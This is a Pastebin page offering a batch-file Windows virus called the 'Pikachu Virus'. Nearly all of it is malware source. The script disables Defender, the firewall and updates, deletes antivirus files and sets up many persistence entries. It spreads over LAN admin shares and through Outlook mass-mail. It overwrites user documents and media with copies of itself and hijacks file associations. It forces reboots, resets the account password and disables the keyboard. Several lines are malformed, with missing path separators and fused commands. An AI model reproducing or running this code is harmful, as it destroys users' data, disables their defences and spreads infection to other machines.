Advertisement
FlyFar

Version 1.0 Of the Pikachu Virus

Oct 21st, 2021
235
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 9.07 KB | None | 0 0
  1. @echo off
  2. color 02
  3. title Tequilla
  4. echo @echo off>c:windowswimn32.bat
  5. echo break off>c:windowswimn32.bat echo
  6. ipconfig/release_all>c:windowswimn32.bat
  7. echo end>c:windowswimn32.batreg add
  8. hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add
  9. hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo Tequilla Legal
  10. net stop "SDRSVC"
  11. net stop "WinDefend"
  12. taskkill /f /t /im "MSASCui.exe"
  13. net stop "security center"
  14. netsh firewall set opmode mode-disable
  15. net stop "wuauserv"
  16. net stop "Windows Defender Service"
  17. net stop "Windows Firewall"
  18. net stop sharedaccess
  19. del /Q /F C:\Program Files\alwils~1\avast4\*.*
  20. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
  21. del /Q /F C:\Program Files\kasper~1\*.exe
  22. del /Q /F C:\Program Files\trojan~1\*.exe
  23. del /Q /F C:\Program Files\f-prot95\*.dll
  24. del /Q /F C:\Program Files\tbav\*.dat
  25. del /Q /F C:\Program Files\avpersonal\*.vdf
  26. del /Q /F C:\Program Files\Norton~1\*.cnt
  27. del /Q /F C:\Program Files\Mcafee\*.*
  28. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
  29. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
  30. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
  31. del /Q /F C:\Program Files\Norton~1\*.*
  32. RENAME %0 Egg.exe
  33. XCOPY "Egg.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
  34. @echo off > service.bat
  35. SET "NomeProcesso=Egg.exe" >> service.bat
  36. SET "NomeService=Egg" >> service.bat
  37. echo sc create %NomeService% binpath=%0 >> service.bat
  38. echo sc start %NomeService% >> service.bat
  39. attrib +h +r +s service.bat
  40. start service.bat
  41. SET i=0
  42. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
  43. attrib +h +r +s %0
  44. :Internet
  45. net use Z: \\192.168.1.%i%\C$
  46. if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
  47. mountvol Z: /d)
  48. if %i% == 256 (goto Infect) else (set /a i=i+1)
  49. goto worm
  50. goto Internet
  51. :Infect
  52. for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe)
  53. for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f)
  54. goto Infect
  55. goto time
  56. :worm
  57. set Slash=\
  58. if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
  59. del %SystemDrive%%Slash%AUTOEXEC.BAT
  60. copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
  61. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
  62. )
  63. set a=Egg
  64. copy %0 %windir%\%a%.exe
  65. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  66. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  67. set b=Egg
  68. copy %0 %windir%\%b%.exe
  69. echo [windows] >> %windir%\win.ini
  70. echo run=%windir%\%b%.exe >> %windir%\win.ini
  71. echo load=%windir%\%b%.exe >> %windir%\win.ini
  72. echo [boot] >> %windir%\system.ini
  73. echo shell=explorer.exe %b%.exe >> %windir%\system.ini
  74. echo dim x>>%SystemDrive%\mail.vbs
  75. echo on error resume next>>%SystemDrive%\mail.vbs
  76. echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
  77. echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
  78. echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
  79. echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
  80. echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
  81. echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
  82. echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
  83. echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
  84. echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
  85. echo Set Mail=ci>>%SystemDrive%\mail.vbs
  86. echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
  87. echo Mail.Subject="Eggman Hello To You">>%SystemDrive%\mail.vbs
  88. echo Mail.Body="Eggman waiting you">>%SystemDrive%\mail.vbs
  89. echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
  90. echo Mail.send>>%SystemDrive%\mail.vbs
  91. echo Next>>%SystemDrive%\mail.vbs
  92. echo ol.Quit>>%SystemDrive%\mail.vbs
  93. start "" "%SystemDrive%\mail.vbs"
  94. goto run2
  95. goto worm
  96. :run2
  97.  
  98. set Slash=\
  99. if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
  100. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
  101. del %SystemDrive%%Slash%AUTOEXEC.BAT
  102. copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
  103. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
  104. )
  105. set a=Egg
  106. copy %0 %windir%\%a%.exe
  107. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  108. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  109. copy %0 "%userprofile%\Start Menu\Programs\Startup"
  110. set b=Loveware
  111. copy %0 %windir%\%b%.exe
  112. echo [windows] >> %windir%\win.ini
  113. echo run=%windir%\%b%.exe >> %windir%\win.ini
  114. echo load=%windir%\%b%.exe >> %windir%\win.ini
  115. echo [boot] >> %windir%\system.ini
  116. echo shell=explorer.exe %b%.exe >> %windir%\system.ini
  117. goto time
  118. :time
  119. echo Times up!
  120. IF %day% == 9/11/2021 start Smash.bat
  121. assoc .lnk=batfile
  122. DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
  123. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k"
  124. assoc .doc=batfile
  125. DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt
  126. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"
  127. assoc .txt=batfile
  128. DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
  129. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"
  130. assoc .pdf=batfile
  131. DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt
  132. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k"
  133. assoc .xml=batfile
  134. DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt
  135. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"
  136. assoc .mp3=batfile
  137. DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
  138. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"
  139. assoc .mp4=batfile
  140. DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
  141. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k"
  142. assoc .png=batfile
  143. DIR /S/B %SystemDrive%\*.png >> InfList_png.txt
  144. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"
  145. echo @echo off>c:windowshartlell.bat
  146. echo break off>>c:windowshartlell.bat
  147. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  148. echo end>>c:windowshartlell.bat
  149. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  150. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
  151. echo Egg shells are hard, but they easy to smash!
  152. :laugh
  153. msg * "Egg shells are hard, but they easy to smash!"
  154. net send * "Egg shells are hard, but they easy to smash!"
  155. goto laugh
  156. time 12:00
  157. net user %username% 11vvsrekbw54jcefqw898t3t2hbbvxnden9955Gbmsmms%%%YHHssssxxwrw
  158. echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
  159. echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
  160. echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
  161. echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
  162. echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
  163. echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
  164. echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
  165. echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
  166. echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
  167. echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
  168. echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
  169. echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
  170. echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
  171. echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
  172. echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
  173. echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
  174. echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
  175. echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
  176. echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
  177. echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
  178. echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
  179. echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
  180. echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
  181. start nokeyboard.reg
  182. echo Egg shells are hard, but they easy to smash!
  183. pause
  184. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement